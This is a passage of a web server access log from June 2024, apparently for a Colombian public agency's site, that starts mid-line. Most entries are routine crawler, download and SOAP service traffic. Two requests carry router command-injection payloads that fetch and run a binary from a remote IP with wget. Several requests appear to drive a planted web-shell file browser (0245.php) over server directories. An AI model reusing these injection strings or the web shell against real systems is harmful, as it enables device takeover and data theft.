jd2zCmKM4FnalVAOeymKsgwQ/kkwrtslKwjbC+GI6jSMVZ8RayYcJE5KIl2mVI7hXvE8NCoJDK6l3zXk2p09hkJvJtene2W795ZIFN83CGaKKkCrlVOY93b3gB3uS1d7yn3SHRkgIO/53H9KVKqY/zYx+MhjtnVZDHLHlsKXMPQhQSdPCrQdf6BT929mHP5JLfLzMIIUMM03gf92CRFE2U9H0aFDA60NjJ2XUS1LzcFbkaP+xKZlMlUEU+Cb3ZOWPifjfm/TWO8SkTHjxcSL40+VrRso2g/xIOhKM01gnxHccx5dv0ovPdhH9MT0Cy+26G/+V7nh1qzDGs5cjB4t9RSWFfPuOMfk+QXas7hY5cABACyQQkfJ1Qe6QxvLDG9eJgmQRImrY1tEiodJDGfhHA0WgyV9nkQK8P7CExqcjBdFqg=&u=U2FsdGVkX1+jPdBlFBGpI3QSFD8fIbN6eZZ3nvS2y8U=&y=U2FsdGVkX18nQG1cLonrXB9zex3kPPG7AIHNsgW1ywUo11k58t4/68eoCiWp3Jo1 HTTP/1.1" 200 4607
186.102.76.76 - - [16/Jun/2024:08:13:52 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18xG1zvIBzkHDcx7zySilW2F3+BPV0ldG41zjYia8Q24PdMHSpPUkYyH9cXNnWUtaYwrRCIT3SK7TUEAXT0TXOU7ZSI2eC5bkq6myVvrZbkl9+qlfKxAojq548NHcO1WbOK/yP3Mz3tzVrbPNapwlCFPWoFfbvi7nTEeWmnzT00Uh5pqwnIad0ux+teLXcvrHgWTv595u8rPihXnb5hOOss/i9G9+d0Q5KtWID4AxH3r281vx+JE6hnxUSa6+YZssXcOguXewBvHjoccZm97pWCTSB6R6LyawpAjfY9oY4OdeVVEWLVoqKrD4r9DW2pOf6OAOxBEufh6HcPk3NkjFqMXC62jJQf/QZ0RYNoT2wTJcp5BG/VjJrXCIEWdn6hCoXzy7RkUqLMiSrn9OUkuJ/ozR1sQG3QlRu2Q4SL99t5jC3Xfq+/o5EwF25mlV2ken7p20FPKEXUzOvB3Sdl1PlFdNwZQb6zFx+nazxlMXzwVV2n4m6u5MHNX/+P/W+mAHxj0aD2oZDTAYWmDCssNNfh+wCmJB6VWtgzLYu51jTcsAJR9Cuw/Zwa+ssy4gdiAXq17JmNPkdlmPtyrf6f8iEmlPTKmOucFA4MDYV1RTw37n9etPpUzG8+++NO7ShGzgbzlhcvTDA8fDXC78JD9NhFkSGamyKI/pIf65rF+zQe1XYbMnt0mQTpLdjErDbeGEZFG55v+sUNDqIODnRTijGTkx190UKLVjjUgTFK9/8cJ5WiSFH2FSe7&u=U2FsdGVkX1+jPdBlFBGpI3QSFD8fIbN6eZZ3nvS2y8U=&y=U2FsdGVkX18nQG1cLonrXB9zex3kPPG7AIHNsgW1ywUo11k58t4/68eoCiWp3Jo1 HTTP/1.1" 200 208
186.102.76.76 - - [16/Jun/2024:08:13:53 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX188SO0yZEV5AtwrZr5GQq9mQGGuxKHYIa2q0HWc0pYhGi2oZAzpETya HTTP/1.1" 200 30244
201.245.192.253 - - [16/Jun/2024:08:14:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.19 - - [16/Jun/2024:08:15:16 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20ANALISIS%20SENTENCIA%20C-554%20DE%202007.doc HTTP/1.1" 304 -
201.245.192.253 - - [16/Jun/2024:08:15:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:08:16:24 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:08:15:12 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.54.205 - - [16/Jun/2024:08:16:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=6048.pdf&ft=img&white=1 HTTP/1.1" 200 356111
172.22.2.4 - - [16/Jun/2024:08:17:01 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
201.245.192.253 - - [16/Jun/2024:08:17:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
40.77.167.8 - - [16/Jun/2024:08:17:31 -0500] "GET /bla/resoluciones/resoluciones%202007/res%202007%202401%20al%202500/RESOLUCION%202488%20DE%202007.pdf HTTP/1.1" 304 -
66.249.66.21 - - [16/Jun/2024:08:17:33 -0500] "GET /Publicaciones/2024EE61089.pdf HTTP/1.1" 404 227
172.22.2.4 - - [16/Jun/2024:08:16:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56779
201.245.192.253 - - [16/Jun/2024:08:17:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34347
201.245.192.253 - - [16/Jun/2024:08:16:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 21442
201.245.192.253 - - [16/Jun/2024:08:18:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [16/Jun/2024:08:18:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:08:18:28 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2024:08:17:03 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 59083
201.245.192.253 - - [16/Jun/2024:08:18:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34361
201.245.192.253 - - [16/Jun/2024:08:19:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:08:19:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34347
201.245.192.253 - - [16/Jun/2024:08:20:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
52.167.144.140 - - [16/Jun/2024:08:20:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/3447.pdf HTTP/1.1" 304 -
201.245.192.253 - - [16/Jun/2024:08:21:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:08:22:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:08:21:02 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:08:23:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [16/Jun/2024:08:23:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:08:23:28 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2024:08:21:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
83.97.73.245 - - [16/Jun/2024:08:23:44 -0500] "GET /actuator/gateway/routes HTTP/1.1" 404 1018
201.245.192.253 - - [16/Jun/2024:08:24:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.46.33 - - [16/Jun/2024:08:25:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=DBQbe.class.php&ft=img&white=1 HTTP/1.1" 200 55556
201.245.192.253 - - [16/Jun/2024:08:25:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:08:24:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 62310
201.245.192.253 - - [16/Jun/2024:08:26:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:08:26:57 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36387
201.245.192.253 - - [16/Jun/2024:08:27:00 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34347
45.148.10.174 - - [16/Jun/2024:08:27:00 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 1018
201.245.192.253 - - [16/Jun/2024:08:27:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.20 - - [16/Jun/2024:08:27:49 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/6074.pdf HTTP/1.1" 200 379562
201.245.192.253 - - [16/Jun/2024:08:28:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [16/Jun/2024:08:28:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:08:28:28 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2024:08:26:52 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.20 - - [16/Jun/2024:08:28:49 -0500] "GET /Publicaciones/2024EE54753.pdf HTTP/1.1" 404 227
201.245.192.253 - - [16/Jun/2024:08:28:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34361
40.77.167.48 - - [16/Jun/2024:08:29:18 -0500] "GET /agendate-para-las-ferias-de-servicios-ambientales-para-mayo-en-usaquen-y-fontibon.html HTTP/1.1" 200 799
47.128.54.208 - - [16/Jun/2024:08:29:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CAFLUENTESYEFUENTES%5C&f=index.html&ft=notepad&white=1 HTTP/1.1" 200 4762
172.22.2.4 - - [16/Jun/2024:08:27:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
201.245.192.253 - - [16/Jun/2024:08:29:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:08:29:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34347
201.245.192.253 - - [16/Jun/2024:08:30:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:08:31:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:08:32:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.21 - - [16/Jun/2024:08:32:55 -0500] "GET /Publicaciones/2024EE64696.pdf HTTP/1.1" 404 227
201.245.192.253 - - [16/Jun/2024:08:33:08 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
185.191.127.212 - - [16/Jun/2024:08:33:10 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.28.141%2Ft+-O-+|+sh%60) HTTP/1.1" 404 1018
201.245.192.253 - - [16/Jun/2024:08:33:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:08:33:28 -0500] "HEAD / HTTP/1.1" 200 -
47.128.120.98 - - [16/Jun/2024:08:33:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=ls&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2017&sort=0a HTTP/1.1" 200 77102
216.244.66.195 - - [16/Jun/2024:08:33:46 -0500] "GET /BLA/resoluciones/AUTOS%202016/2041.pdf HTTP/1.1" 200 599744
172.22.2.4 - - [16/Jun/2024:08:32:42 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2024:08:34:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:08:34:26 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [16/Jun/2024:08:33:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54913
201.245.192.253 - - [16/Jun/2024:08:35:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [16/Jun/2024:08:34:39 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 59583
201.245.192.253 - - [16/Jun/2024:08:36:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2024:08:36:57 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36387
201.245.192.253 - - [16/Jun/2024:08:37:00 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34347
201.245.192.253 - - [16/Jun/2024:08:37:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.39.7 - - [16/Jun/2024:08:37:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1640.pdf&ft=img&white=1 HTTP/1.1" 200 380687
66.249.66.21 - - [16/Jun/2024:08:37:57 -0500] "GET /BLA/resoluciones/AUTOS%202023/3392.pdf HTTP/1.1" 200 1216787
201.245.192.253 - - [16/Jun/2024:08:38:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [16/Jun/2024:08:38:23 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [16/Jun/2024:08:38:28 -0500] "HEAD / HTTP/1.1" 200 -
